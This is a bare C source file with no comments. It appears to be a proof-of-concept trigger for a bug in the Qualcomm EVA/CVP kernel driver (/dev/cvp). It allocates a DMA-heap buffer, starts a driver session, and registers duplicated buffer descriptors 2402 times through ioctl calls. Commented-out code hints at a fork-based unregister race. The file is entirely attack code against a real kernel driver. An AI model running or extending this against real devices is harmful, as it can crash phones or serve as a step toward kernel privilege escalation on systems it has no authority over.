#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <linux/dma-heap.h>
#include <sys/mman.h>
#include <errno.h>
#include <pthread.h>
#include "msm_eva_private.h"
int main() {
    int fd = open("/dev/cvp",O_RDWR);
    if(fd == -1) {
        printf("open: %m\n");
        return 1;
    }
    int dma_heap = open("/dev/dma_heap/qcom,system",O_RDONLY);
    if(dma_heap == -1) {
        printf("open dma_heap: %m\n");
        return -1;
    }
    struct dma_heap_allocation_data heap_data = {
        .len = 0x1000,
        .fd_flags = O_RDWR,
    };
    long ret = ioctl(dma_heap,DMA_HEAP_IOCTL_ALLOC,&heap_data);
    if( ret < 0 || heap_data.fd < 0)
    {
        printf("dma heap allocation fail: %d %d %m\n",ret,heap_data.fd);
        return -1;
    }

    struct eva_kmd_arg create_session_arg = {
        .type = EVA_KMD_SESSION_CONTROL,
        .data.session_ctrl.ctrl_type = SESSION_CREATE,
    };
    errno = 0;

    ret = ioctl(fd,0,&create_session_arg);
    printf("ret: %ld %m\n",ret);
    if(ret < 0) {
        return 1;
    }
    create_session_arg.data.session_ctrl.ctrl_type = SESSION_START;

    ret = ioctl(fd,0,&create_session_arg);
    printf("ret: %ld %m\n",ret);
    if(ret < 0) {
        return 1;
    }

    for(unsigned i = 0; i < 2402; i++) {        
        struct eva_kmd_arg register_buf_arg = {
            .type = EVA_KMD_REGISTER_BUFFER,
            .data.regbuf.fd = dup(heap_data.fd),
            .data.regbuf.offset = 0,
            .data.regbuf.size = 0x1000,
            .data.regbuf.index = 0,
        };
        errno = 0;
        ret = ioctl(fd,0,&register_buf_arg);
        printf("ret: %ld %m\n",ret);
        // if(ret < 0) {
        //     return 1;
        // }
        // struct eva_kmd_arg unregister_buf_arg = {
        //     .type = EVA_KMD_UNREGISTER_BUFFER,
        //     .data.unregbuf.fd = heap_data.fd,
        //     .data.unregbuf.offset = 0,
        //     .data.unregbuf.size = 0x1000,
        //     .data.unregbuf.index = 0,
        //     .data.unregbuf.reserved[0] = 1
        // };
        // pid_t pid = fork();
        // ret = ioctl(fd,0,&unregister_buf_arg);
        // if(!pid) exit(0);
        // printf("ret: %ld %m\n",ret);
        // wait(NULL);
    }
    return 0;
}